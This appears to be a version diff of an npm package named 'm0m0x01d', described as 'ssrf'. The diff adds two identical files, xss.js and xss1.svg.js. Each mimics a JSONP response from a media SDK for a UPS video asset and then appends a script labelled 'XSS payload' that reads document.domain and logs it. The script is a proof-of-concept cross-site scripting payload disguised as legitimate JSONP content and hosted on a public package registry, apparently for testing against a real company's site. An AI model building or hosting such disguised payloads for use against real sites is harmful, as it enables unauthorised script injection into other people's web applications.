m0m0x01d 23.0.0 → 25.0.0

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "m0m0x01d",
-  "version": "23.0.0",
+  "version": "25.0.0",
   "description": "ssrf",
   "main": "index.html",
   "scripts": {

package/xss.js

@@ -0,0 +1,46 @@
+/*jsonp*/
+s7classics7sdkJSONResponse({
+    "set": {
+        "pv": "1.0",
+        "type": "video",
+        "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+        "item": {
+            "v": {
+                "path": "upsprod/_media_/e03/e035b19f-f70b-4213-9b2a-e49a8cfce5b4.mp4",
+                "dx": "1920",
+                "dy": "1080",
+                "bitrate": "60947580",
+                "id": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+                "suffix": "mp4"
+            },
+            "i": {
+                "mod": "layer=0&src=is(upsprod/Coco vs. the Doubters_Coco with SMBs)",
+                "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix"
+            },
+            "type": "video",
+            "iv": "zJZEa1",
+            "userdata": [{
+                "Audio_Codec": "AAC LC",
+                "Audio_Sample_Rate": "48.0",
+                "Number_Audio_Channels": "2",
+                "Video_Codec": "AVC",
+                "Video_Frame_Rate": "24.000",
+                "Video_Length": "30.0"
+            }, {
+                "Audio_Codec": "AAC LC",
+                "Audio_Sample_Rate": "48.0",
+                "Number_Audio_Channels": "2",
+                "Video_Codec": "AVC",
+                "Video_Frame_Rate": "24.000",
+                "Video_Length": "30.0"
+            }]
+        }
+    }
+}, "130443601");
+
+// XSS payload: inject document.domain into the JSONP response without breaking functionality
+(function(){
+    var xss_payload = document.domain;
+    console.log("Injected XSS payload: " + xss_payload);
+})();
+

package/xss1.svg.js

@@ -0,0 +1,46 @@
+/*jsonp*/
+s7classics7sdkJSONResponse({
+    "set": {
+        "pv": "1.0",
+        "type": "video",
+        "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+        "item": {
+            "v": {
+                "path": "upsprod/_media_/e03/e035b19f-f70b-4213-9b2a-e49a8cfce5b4.mp4",
+                "dx": "1920",
+                "dy": "1080",
+                "bitrate": "60947580",
+                "id": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+                "suffix": "mp4"
+            },
+            "i": {
+                "mod": "layer=0&src=is(upsprod/Coco vs. the Doubters_Coco with SMBs)",
+                "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix"
+            },
+            "type": "video",
+            "iv": "zJZEa1",
+            "userdata": [{
+                "Audio_Codec": "AAC LC",
+                "Audio_Sample_Rate": "48.0",
+                "Number_Audio_Channels": "2",
+                "Video_Codec": "AVC",
+                "Video_Frame_Rate": "24.000",
+                "Video_Length": "30.0"
+            }, {
+                "Audio_Codec": "AAC LC",
+                "Audio_Sample_Rate": "48.0",
+                "Number_Audio_Channels": "2",
+                "Video_Codec": "AVC",
+                "Video_Frame_Rate": "24.000",
+                "Video_Length": "30.0"
+            }]
+        }
+    }
+}, "130443601");
+
+// XSS payload: inject document.domain into the JSONP response without breaking functionality
+(function(){
+    var xss_payload = document.domain;
+    console.log("Injected XSS payload: " + xss_payload);
+})();
+